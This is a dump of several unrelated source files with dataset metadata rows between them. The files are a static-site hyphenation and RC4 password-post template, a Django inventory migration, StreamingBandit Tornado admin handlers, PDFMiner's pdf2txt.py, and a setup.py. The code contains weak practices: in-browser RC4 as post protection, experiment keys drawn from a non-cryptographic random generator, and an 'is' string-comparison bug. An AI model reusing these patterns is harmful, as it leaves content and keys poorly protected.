new_data = ' '.join([hyphenator.inserted(w, hyphen='\u00AD')
for w in text.split(' ')])
# Spaces are trimmed, we have to add them manually back
if text[0].isspace():
new_data = ' ' + new_data
if text[-1].isspace():
new_data += ' '
setattr(node, attr, new_data)
for child in node.iterchildren():
insert_hyphens(child, hyphenator)
CRYPT = string.Template("""\
<script>
function rc4(key, str) {
var s = [], j = 0, x, res = '';
for (var i = 0; i < 256; i++) {
s[i] = i;
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
}
i = 0;
j = 0;
for (var y = 0; y < str.length; y++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
}
return res;
}
function decrypt() {
key = $$("#key").val();
crypt_div = $$("#encr")
crypted = crypt_div.html();
decrypted = rc4(key, window.atob(crypted));
if (decrypted.substr(decrypted.length - 11) == "<!--tail-->"){
crypt_div.html(decrypted);
$$("#pwform").hide();
crypt_div.show();
} else { alert("Wrong password"); };
}
</script>
<div id="encr" style="display: none;">${data}</div>
<div id="pwform">
<form onsubmit="javascript:decrypt(); return false;" class="form-inline">
<fieldset>
<legend>This post is password-protected.</legend>
<input type="password" id="key" placeholder="Type password here">
<button type="submit" class="btn">Show Content</button>
</fieldset>
</form>
</div>""")
| mit | 5,035,294,736,049,951,000 | 38.76431 | 159 | 0.582409 | false | 4.003729 | true | false | false |
GETLIMS/LIMS-Backend | lims/inventory/migrations/0001_initial.py | 1 | 6145 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import mptt.fields
import gm2m.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='AmountMeasure',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=100)),
('symbol', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=100)),
('identifier', models.CharField(unique=True, blank=True, null=True, db_index=True, max_length=20)),
('description', models.TextField(blank=True, null=True)),
('in_inventory', models.BooleanField(default=False)),
('amount_available', models.IntegerField(default=0)),
('added_on', models.DateTimeField(auto_now_add=True)),
('last_updated_on', models.DateTimeField(auto_now=True)),
('added_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
('amount_measure', models.ForeignKey(to='inventory.AmountMeasure')),
('created_from', models.ManyToManyField(to='inventory.Item', blank=True, related_name='created_from_rel_+')),
],
),
migrations.CreateModel(
name='ItemProperty',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=200)),
('value', models.TextField()),
('item', models.ForeignKey(to='inventory.Item', related_name='properties')),
],
),
migrations.CreateModel(
name='ItemTransfer',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('amount_taken', models.IntegerField(default=0)),
('barcode', models.CharField(blank=True, null=True, max_length=20)),
('coordinates', models.CharField(blank=True, null=True, max_length=2)),
('transfer_complete', models.BooleanField(default=False)),
('amount_measure', models.ForeignKey(to='inventory.AmountMeasure')),
('item', models.ForeignKey(to='inventory.Item')),
],
),
migrations.CreateModel(
name='ItemType',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(unique=True, db_index=True, max_length=150)),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('parent', mptt.fields.TreeForeignKey(null=True, related_name='children', to='inventory.ItemType', blank=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=100)),
('code', models.CharField(unique=True, null=True, max_length=6)),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('parent', mptt.fields.TreeForeignKey(null=True, related_name='children', to='inventory.Location', blank=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Set',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=40)),
('is_public', models.BooleanField(default=False)),
('is_partset', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='item',
name='item_type',
field=mptt.fields.TreeForeignKey(to='inventory.ItemType'),
),
migrations.AddField(
model_name='item',
name='location',
field=mptt.fields.TreeForeignKey(null=True, to='inventory.Location', blank=True),
),
migrations.AddField(
model_name='item',
name='sets',
field=gm2m.fields.GM2MField('inventory.Set', through_fields=('gm2m_src', 'gm2m_tgt', 'gm2m_ct', 'gm2m_pk'), related_name='items'),
),
migrations.AddField(
model_name='item',
name='tags',
field=models.ManyToManyField(to='inventory.Tag', blank=True),
),
]
| mit | 7,413,653,602,382,370,000 | 46.269231 | 142 | 0.559642 | false | 4.398712 | false | false | false |
MKaptein/streamingbandit | app/handlers/adminhandlers.py | 1 | 19180 | # -* coding: utf-8 -*-
import tornado.escape
import tornado.ioloop
import tornado.web
import json
import random
import os
from handlers.basehandler import BaseHandler, ExceptionHandler
from core.experiment import Experiment
from db.database import Database
from db.mongolog import MongoLog
from db.users import Users
class GenerateExperiments(BaseHandler):
def get(self):
""" Retrieve a list of experiments running on this server
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:returns: A JSON containing exp_id and name pairs.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
user = self.get_current_user()
if user:
db = Database()
response = db.get_all_experiments(int(user))
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
def post(self):
""" Create a new experiment
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp |
| {"name" : NAME, "get_context" : CODE, "get_action" : CODE, |
| "get_reward" : CODE, "set_reward" : CODE, "advice_id" : True, |
| "hourly_theta" : True, "delta_hours" : DELTA_HOURS, |
| "default_reward" : DEFAULT_REWARD} |
+--------------------------------------------------------------------+
.. note:: The parameters for the POST calls have to be posted in the \
body as a JSON object.
:requires: A secure cookie obtained by logging in.
:param string name: Name of the experiment.
:param string get_context (optional): String of python code for get context code.
:param string get_action (optional): String of python code for get action code.
:param string get_reward (optional): String of python code for get reward code.
:param string set_reward (optional): String of python code for set reward code.
:param bool hourly_theta: Bool indicating whether the state of Theta should be stored hourly.
:param bool advice_id: Bool indicating whether the getadvice and setreward calls should return an advice_id.
:param int delta_hours: If advice_id is True, supply this to give the number of hours that an advice_id should be stored (between 0 and 99999).
:param dict default_reward: If advice_id is True, supply this to give the default reward for advice_id's that are over their delta_hours limit.
:returns: A JSON of the form:
.. code-block:: json
{
"id" : The assigned experiment id,
"name" : The name of the experiment (checked for duplicates),
"error" : (Optional) error message
"key" : The key for the experiment
}
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
user = self.get_current_user()
if user:
data = tornado.escape.json_decode(self.request.body)
exp_obj = {}
exp_obj["user_id"] = int(user)
exp_obj["name"] = data["name"]
if "get_context" in data:
exp_obj["get_context"] = data["get_context"]
else:
exp_obj["get_context"] = ""
if "get_action" in data:
exp_obj["get_action"] = data["get_action"]
else:
exp_obj["get_action"] = ""
if "get_reward" in data:
exp_obj["get_reward"] = data["get_reward"]
else:
exp_obj["get_reward"] = ""
if "set_reward" in data:
exp_obj["set_reward"] = data["set_reward"]
else:
exp_obj["set_reward"] = ""
exp_obj["hourly_theta"] = data["hourly_theta"]
exp_obj["advice_id"] = data["advice_id"]
if exp_obj["advice_id"] in ["true", "True", "y", "yes"]:
exp_obj["advice_id"] = "True"
else:
exp_obj["advice_id"] = "False"
if exp_obj["advice_id"] is "True":
if 0 <= int(data["delta_hours"]) <= 99999:
exp_obj["delta_hours"] = data["delta_hours"]
else:
raise ExceptionHandler(reason = "Supplied number for delta hours must be between 0 and 99999.", status_code = 400)
exp_obj["default_reward"] = data["default_reward"]
exp_obj["key"] = hex(random.getrandbits(42))[2:-1]
db = Database()
insertid = db.insert_experiment(exp_obj)
response = {}
response["name"] = exp_obj["name"]
response["id"] = insertid
response["key"] = exp_obj["key"]
response["error"] = False
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class UpdateExperiment(BaseHandler):
def get(self, exp_id):
""" Retrieve a specific experiment running on this server
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int exp_id: Experiment ID for the experiment that is to be retrieved.
:returns: A JSON containing all the info for the expriment.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_current_user():
if self.validate_user_experiment(exp_id):
db = Database()
response = db.get_one_experiment(exp_id)
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
def delete(self, exp_id):
""" Delete an experiment
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int exp_id: The ID of the experiment to be deleted.
:returns: A JSON showing the deleted experiment.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_current_user():
if self.validate_user_experiment(exp_id):
db = Database()
mongo_db = MongoLog()
response = db.delete_experiment(exp_id)
mongo_db.log_deleted_experiment(response)
self.write(json.dumps(response['exp_id']))
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
def put(self, exp_id):
""" Edit an experiment
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID |
| {"name" : NAME, "getcontext" : CODE, "getaction" : CODE, |
| "getreward" : CODE, "setreward" : CODE, "advice_id" : True, |
| "hourly_theta" : True, "delta_hours" : DELTA_HOURS, |
| "default_reward" : DEFAULT_REWARD} |
+--------------------------------------------------------------------+
.. note:: The parameters for the PUT calls have to be posted in the \
body as a JSON object.
:requires: A secure cookie obtained by logging in.
:param string name: Name of the experiment.
:param string get_context (optional): String of python code for get context code.
:param string get_action (optional): String of python code for get action code.
:param string get_reward (optional): String of python code for get reward code.
:param string set_reward (optional): String of python code for set reward code.
:param bool hourly_theta: Bool indicating whether the state of Theta should be stored hourly.
:param bool advice_id: Bool indicating whether the getAdvice and setReward calls should return an advice_id.
:param int delta_hours: If advice_id is True, supply this to give the number of hours that an advice_id should be stored.
:param dict default_reward: If advice_id is True, supply this to give the default reward for advice_id's that are over their delta_hours limit.
:returns: A JSON indicating success.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
user = self.get_current_user()
if user:
if self.validate_user_experiment(exp_id):
data = tornado.escape.json_decode(self.request.body)
exp_obj = {}
exp_obj["user_id"] = int(user)
exp_obj["name"] = data["name"]
if "get_context" in data:
exp_obj["get_context"] = data["get_context"]
else:
exp_obj["get_context"] = ""
if "get_action" in data:
exp_obj["get_action"] = data["get_action"]
else:
exp_obj["get_action"] = ""
if "get_reward" in data:
exp_obj["get_reward"] = data["get_reward"]
else:
exp_obj["get_reward"] = ""
if "set_reward" in data:
exp_obj["set_reward"] = data["set_reward"]
else:
exp_obj["set_reward"] = ""
exp_obj["hourly_theta"] = data["hourly_theta"]
exp_obj["advice_id"] = data["advice_id"]
if exp_obj["advice_id"] in ["true", "True", "y", "yes"]:
exp_obj["advice_id"] = "True"
else:
exp_obj["advice_id"] = "False"
if exp_obj["advice_id"] is "True":
if 0 <= int(data["delta_hours"]) <= 99999:
exp_obj["delta_hours"] = data["delta_hours"]
else:
raise ExceptionHandler(reason = "Supplied number for delta hours must be between 0 and 99999.", status_code = 400)
exp_obj["default_reward"] = data["default_reward"]
db = Database()
response = {}
response["id"] = db.edit_experiment(exp_obj, exp_id)
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class ListDefaults(BaseHandler):
def get(self):
""" Get the list with default available experiments.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/defaults |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:returns: A JSON with the default experiments.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_secure_cookie("user"):
folderdata = sorted([f for f in os.listdir("./defaults") if not f.startswith('.')])
folderdata = [x.replace("_"," ") for x in folderdata]
folders = dict(enumerate(folderdata))
self.write(folders)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class GetDefault(BaseHandler):
def get(self, default_id):
""" Retrieve properties of a default experiment.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/defaults/DEFAULT_ID |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int default_id: The ID of the default experiment.
:returns: A JSON containing the experiment properties.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_secure_cookie("user"):
folderdata = sorted([f for f in os.listdir("./defaults") if not f.startswith('.')])
folderdata = dict(enumerate(folderdata))
data={}
data["name"] = folderdata[int(default_id)]
filenames = ["get_context", "get_action", "get_reward", "set_reward"]
for filename in filenames:
if os.path.isfile("./defaults/"+data["name"]+"/"+filename+".py"):
data[filename] = open("./defaults/"+data["name"]+"/"+filename+".py").read()
self.write(data)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class ResetExperiment(BaseHandler):
def get(self, exp_id):
""" Reset the theta of an experiment.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID/resetexperiment?key=KEY |
| &theta_key=THETA_KEY&theta_value=THETA_VALUE |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int exp_id: The experiment ID.
:param string key: The key of the experiment.
:param string theta_key (optional): The key for theta used when setting \
theta in the setReward and getAction code.
:param string theta_value (optional): The value for theta used when \
setting theta in the setReward and getAction code.
:raises 401: If the theta_key or theta_value does not exist or is not valid.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_secure_cookie("user"):
if self.validate_user_experiment(exp_id):
key = self.get_argument("key", default = False)
theta_key = self.get_argument("theta_key", default = None)
theta_value = self.get_argument("theta_value", default = None)
__EXP__ = Experiment(exp_id, key)
status = __EXP__.delete_theta(key = theta_key, value = theta_value)
if status >= 1:
self.write(json.dumps({'status':'success'}))
else:
raise ExceptionHandler(reason = "Theta_key or theta_value could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class AddUser(BaseHandler):
def post(self):
""" Add a user to StreamingBandit.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/user |
| {"username" : USERNAME, "password" : PASSWORD} |
+--------------------------------------------------------------------+
.. note:: The parameters for the POST calls have to be posted in the \
body as a JSON object.
:param string username: The preferred username.
:param string password: The preferred password.
:returns: JSON indicating success.
:raises 400: If user with username already exists.
"""
if self.valid_admin():
data = tornado.escape.json_decode(self.request.body)
users = Users()
username = data["username"]
password = data["password"]
user_id = users.create_user(username, password)
if user_id is False:
raise ExceptionHandler(reason = "User already exists.", status_code = 400)
else:
self.write(json.dumps({'status' : 'success'}))
else:
raise ExceptionHandler(reason = "You are not an admin.", status_code = 401)
| mit | 3,692,329,213,822,720,500 | 49.209424 | 151 | 0.4756 | false | 4.863083 | false | false | false |
madhav-datt/spell-check | pdf_text/pdf2txt.py | 1 | 4620 | #
# pdf2txt.py from the FOSS python PDFMiner package
# http://euske.github.io/pdfminer/index.html#pdf2txt
# Extract text from PDF to text files
#
# Has to be run separately with python2.X (not compatible with python3.X)
#
import sys
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfdevice import PDFDevice, TagExtractor
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import XMLConverter, HTMLConverter, TextConverter
from pdfminer.cmapdb import CMapDB
from pdfminer.layout import LAParams
from pdfminer.image import ImageWriter
def main(argv):
import getopt
def usage():
print('usage: %s [-d] [-p pagenos] [-m maxpages] [-P password] [-o output]'
' [-C] [-n] [-A] [-V] [-M char_margin] [-L line_margin] [-W word_margin]'
' [-F boxes_flow] [-Y layout_mode] [-O output_dir] [-R rotation]'
' [-t text|html|xml|tag] [-c codec] [-s scale]'
' file ...' % argv[0])
return 100
try:
(opts, args) = getopt.getopt(argv[1:], 'dp:m:P:o:CnAVM:L:W:F:Y:O:R:t:c:s:')
except getopt.GetoptError:
return usage()
if not args:
return usage()
# debug option
debug = 0
# input option
password = ''
pagenos = set()
maxpages = 0
# output option
outfile = None
outtype = None
imagewriter = None
rotation = 0
layoutmode = 'normal'
codec = 'utf-8'
pageno = 1
scale = 1
caching = True
showpageno = True
laparams = LAParams()
for (k, v) in opts:
if k == '-d':
debug += 1
elif k == '-p':
pagenos.update(int(x) - 1 for x in v.split(','))
elif k == '-m':
maxpages = int(v)
elif k == '-P':
password = v
elif k == '-o':
outfile = v
elif k == '-C':
caching = False
elif k == '-n':
laparams = None
elif k == '-A':
laparams.all_texts = True
elif k == '-V':
laparams.detect_vertical = True
elif k == '-M':
laparams.char_margin = float(v)
elif k == '-L':
laparams.line_margin = float(v)
elif k == '-W':
laparams.word_margin = float(v)
elif k == '-F':
laparams.boxes_flow = float(v)
elif k == '-Y':
layoutmode = v
elif k == '-O':
imagewriter = ImageWriter(v)
elif k == '-R':
rotation = int(v)
elif k == '-t':
outtype = v
elif k == '-c':
codec = v
elif k == '-s':
scale = float(v)
#
PDFDocument.debug = debug
PDFParser.debug = debug
CMapDB.debug = debug
PDFResourceManager.debug = debug
PDFPageInterpreter.debug = debug
PDFDevice.debug = debug
#
rsrcmgr = PDFResourceManager(caching=caching)
if not outtype:
outtype = 'text'
if outfile:
if outfile.endswith('.htm') or outfile.endswith('.html'):
outtype = 'html'
elif outfile.endswith('.xml'):
outtype = 'xml'
elif outfile.endswith('.tag'):
outtype = 'tag'
if outfile:
outfp = file(outfile, 'w')
else:
outfp = sys.stdout
if outtype == 'text':
device = TextConverter(rsrcmgr, outfp, codec=codec, laparams=laparams,
imagewriter=imagewriter)
elif outtype == 'xml':
device = XMLConverter(rsrcmgr, outfp, codec=codec, laparams=laparams,
imagewriter=imagewriter)
elif outtype == 'html':
device = HTMLConverter(rsrcmgr, outfp, codec=codec, scale=scale,
layoutmode=layoutmode, laparams=laparams,
imagewriter=imagewriter)
elif outtype == 'tag':
device = TagExtractor(rsrcmgr, outfp, codec=codec)
else:
return usage()
for fname in args:
fp = file(fname, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages(fp, pagenos,
maxpages=maxpages, password=password,
caching=caching, check_extractable=True):
page.rotate = (page.rotate + rotation) % 360
interpreter.process_page(page)
fp.close()
device.close()
outfp.close()
return
if __name__ == '__main__':
sys.exit(main(sys.argv))
| gpl-2.0 | 2,343,243,574,910,225,400 | 30.643836 | 87 | 0.540693 | false | 3.77451 | false | false | false |
cedadev/ndg_security_common | setup.py | 1 | 2632 | #!/usr/bin/env python
"""Distribution Utilities setup program for NDG Security Package
NERC Data Grid Project
"""
__author__ = "P J Kershaw"
__date__ = "24/04/06"
__copyright__ = "(C) 2009 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "[email protected]"
__revision__ = '$Id$'
# Bootstrap setuptools if necessary.
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
import sys
import os
# Packages needed for NDG Security
# Note commented out ones fail with PyPI - use explicit link instead
_PKG_DEPENDENCIES = [
'ndg-httpsclient',
'ndg_saml',
'ndg_xacml'
]
# Python 2.5 includes ElementTree by default
if sys.version_info[0:2] < (2, 5):
_PKG_DEPENDENCIES += ['ElementTree', 'cElementTree']
THIS_DIR = os.path.dirname(__file__)
try:
LONG_DESCR = open(os.path.join(THIS_DIR, 'README.md')).read()
except IOError:
LONG_DESCR = """\
NDG Security package for components common to client and server side
====================================================================
NDG Security is the security system originally developed for the UK Natural
Environment Research Council funded NERC DataGrid. It's a system to provide
federated access control and identity management and has been applied for use
with the Earth System Grid Federation.
"""
setup(
name = 'ndg_security_common',
version = '2.5.0',
description = 'NERC DataGrid Security package containing common '
'utilities used by both server and client '
'packages',
long_description = LONG_DESCR,
author = 'Philip Kershaw',
author_email = '[email protected]',
maintainer = 'Philip Kershaw',
maintainer_email = '[email protected]',
url = 'https://github.com/cedadev/ndg_security_common',
license = 'BSD - See LICENCE file for details',
install_requires = _PKG_DEPENDENCIES,
extras_require = {
# M2Crypto is required for SSL Client based validation of OpenID
# Providers
'openid_relying_party_provider_validation': ["M2Crypto"],
},
dependency_links = ["http://dist.ceda.ac.uk/pip/"],
packages = find_packages(),
namespace_packages = ['ndg', 'ndg.security'],
entry_points = None,
test_suite = 'ndg.security.common.test',
zip_safe = False
)
| bsd-3-clause | 2,917,347,022,940,199,400 | 34.093333 | 79 | 0.628799 | false | 3.518717 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.